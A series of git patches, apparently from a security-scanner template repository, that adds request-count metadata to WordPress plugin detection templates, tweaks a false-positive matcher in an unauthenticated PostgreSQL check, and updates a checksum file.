under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 95da9ded2ca8cc15ce36090f3a0784493654b1d4 Mon Sep 17 00:00:00 2001 From: pentesttoolscom Date: Fri, 1 Sep 2023 11:25:07 +0300 Subject: [PATCH 0065/1090] Fix unauth_psql detection on other protocols If the protocol we send the request to reflects our message we detect it as a FP. Excluding a 500 error code should be a more general rule. --- network/misconfig/unauth-psql.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/misconfig/unauth-psql.yaml b/network/misconfig/unauth-psql.yaml index 8b7cd6616e..cbe4f4cceb 100644 --- a/network/misconfig/unauth-psql.yaml +++ b/network/misconfig/unauth-psql.yaml @@ -37,8 +37,10 @@ tcp: condition: and - type: word + part: raw words: - "FTP" - "HTTP" + - "500" condition: or negative: true From 0e0902e24c35a9ab86b78f912d977f3e64c31c6e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 1 Sep 2023 09:17:41 +0000 Subject: [PATCH 0067/1090] Auto Generated Templates Checksum [Fri Sep 1 09:17:41 UTC 2023] :robot: --- templates-checksum.txt | 404 ++++++++++++++++++++--------------------- 1 file changed, 202 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f93ac4526e..f7531e1a1f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2236,7 +2236,7 @@ http/cves/2022/CVE-2022-26148.yaml:3d63c3c54ccceebb6834e30ac08e30ba14cabeea http/cves/2022/CVE-2022-26159.yaml:3b77229394b437c585c570e3253c1f56690a2bb5 http/cves/2022/CVE-2022-26233.yaml:bf0b2d1e3cc09228bb8fa9cdedf39d425dd73adc http/cves/2022/CVE-2022-26263.yaml:28ef01e032bc2a5fe99e8de5677f4350b711d1e7 -http/cves/2022/CVE-2022-2627.yaml:f77c674bb02e26f164b54012aaadd31242e72d30 +http/cves/2022/CVE-2022-2627.yaml:d026b886c144d021596fa224edc521639a3c4a05 http/cves/2022/CVE-2022-2633.yaml:eb0d6e871e026e54ea530a19ee544c7523a43515 http/cves/2022/CVE-2022-26352.yaml:117ad67580f651f62733b47d50fd68de369bacbe http/cves/2022/CVE-2022-26564.yaml:48eeb6c3f3af813ff7f60114e697000288d5e80d @@ -5793,217 +5793,217 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 